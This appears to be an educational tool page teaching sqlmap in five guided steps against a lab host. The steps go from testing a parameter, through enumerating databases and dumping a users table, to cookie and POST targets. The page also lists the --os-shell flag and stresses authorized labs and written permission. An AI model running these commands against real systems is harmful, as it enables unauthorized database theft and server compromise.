home/toolvault/web app testing/sqlmap

sqlmap //

Web App Testingsqli automation

Find an injectable parameter and sqlmap escalates from 'huh, odd error' to full database dump — automatically. Learn the manual technique on PortSwigger first, then let sqlmap flex.

difficulty · intermediate
15 min
time to first win
5
guided steps
0
students started here*

HOW TO USE SQLMAP

Follow the steps — click any step card to replay the terminal demo from that point. Everything runs in a lab you control.

sqlmap — guided lab session
static view
step 01

Test a suspicious parameter

sqlmap -u "http://10.0.2.8/item.php?id=1"

Quote the URL! Any param like ?id= is candidate #1.

step 02

List the databases

sqlmap -u "…?id=1" --dbs

--dbs enumerates schemas the app user can see.

step 03

Enumerate tables

sqlmap -u "…?id=1" -D acuart --tables

-D picks the database.

step 04

Dump the users

sqlmap -u "…?id=1" -D acuart -T users --dump

Loot lands in ~/.sqlmap/output — your evidence for reports.

step 05

Cookie / POST targets

sqlmap -u "…/profile" --cookie="session=abc" --level=3 --risk=2

--level/--risk widen coverage — noisy, so lab-restricted.

THE WORKFLOW AT A GLANCE

🎯
Parameter
?id=1
🧪
Test
injectable?
📚
--dbs
enumerate
📤
--dump
extract
📝
Evidence
report
LEARNING CURVE
intermediate — 15 min to first win

FLAGS & SUPER-MOVES

-utarget URL
--dbs / --tablesenumerate
-D / -Tpick db / table
--dumpextract rows
--batchno questions asked
--level/--riskthoroughness 1–5 / 1–3
--os-shellinteractive shell (labs!)

PRO TIPS

01

Start manual

Start manual: a single ' and reading the error teaches more than 100 runs.

02

DVWA + PortSwigger SQLi labs are perfect legal playgrounds.

DVWA + PortSwigger SQLi labs are perfect legal playgrounds.

03

Output CSVs slot straight into pentest reports.

Output CSVs slot straight into pentest reports.

04

Never --os-* outside your lab; it writes files on the server.

Never --os-* outside your lab; it writes files on the server.

⚖️

Golden rule

Use sqlmap only on systems you own or have written permission to test. Your lab: Kali + Metasploitable2, DVWA, TryHackMe & HackTheBox — plenty of legal targets, zero risk.

KEEP DIGGING

CYBER//ZERO ToolVault
Animated deep-dives on every tool in the guide.
✍️ Author LDM · ldmhub4u@gmail.com
full guide v1 · v2 immersive · latest news
Made for learners, everywhere · 2026
*plausibly. verify commands with official docs.